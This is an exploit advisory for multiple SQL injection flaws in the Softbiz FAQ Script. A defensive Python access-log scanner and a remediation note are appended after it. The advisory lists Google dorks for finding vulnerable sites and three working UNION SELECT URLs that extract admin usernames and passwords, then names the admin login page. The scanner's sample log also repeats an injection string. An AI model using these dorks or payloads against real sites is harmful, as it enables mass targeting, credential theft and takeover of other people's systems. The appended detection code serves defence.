 ___________________________________________________

  Softbiz FAQ Script Multiple SQL Injection Vulnerability
 ___________________________________________________

 --------------------IQ-Security--------------------

  Author: Hussin X
  Home  : WwW.IQ-TY.CoM | wWw.TrYaG.cC
  email : darkangel_g85[at]Yahoo[DoT]com
 ___________________________________________________

  script : http://www.softbizscripts.com

  DorK : inurl:"faq_qanda.php?id="
  DorK : inurl:"index.php?cid="
  DorK : inurl: "print_article.php?id="
 ___________________________________________________

 Exploit:
 ________

 1
 www.[target].com/Script/faq_qanda.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--

 2
 www.[target].com/Script/index.php?cid=-1+union+select+null,concat_ws(0x3a,adminname,adminpwd),null,null+from+sb_faq_admin--

 3
 www.[target].com/Script/print_article.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--

 Login : www.[target].com/Script/admin/

 ____________________________( Greetz )_________________________________

  IQ-Security > WwW.IQ-TY.CoM | wWw.TrYaG.cC

  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr |
  Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
 ______________________________________________________________________

 Im IRAQi
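
Added example (not part of the original advisory and not vendor code): a Python check for web-server access logs that flags requests to the three scripts named above whose id/cid value is not a plain integer. The log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script name -> numeric parameter named in the advisory.
NUMERIC_PARAMS = {
    "faq_qanda.php": "id",
    "index.php": "cid",
    "print_article.php": "id",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate ids are unsigned decimal integers.
INTEGER_RE = re.compile(r"[0-9]{1,10}")

def suspicious_value(url):
    """Return the offending parameter value, or None if the request is clean."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    param = NUMERIC_PARAMS.get(script)
    if param is None:
        return None
    # parse_qs URL-decodes and turns '+' into spaces; keep empty values too.
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    for value in values:
        if not INTEGER_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Yield (line_number, value) for each log line with a non-integer id/cid."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_value(match.group(1))
            if value is not None:
                yield number, value

# Constructed sample log lines (Apache combined format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /Script/faq_qanda.php?id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /Script/index.php?cid=-1+union+select+null,null HTTP/1.1" 200 911',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /Script/print_article.php?id=7%27 HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /Script/index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer parameter value {value!r}")
```

The same integer-only rule, enforced in the application before the value reaches the SQL query (or replaced by a parameterized query), removes the injection point rather than only detecting its use.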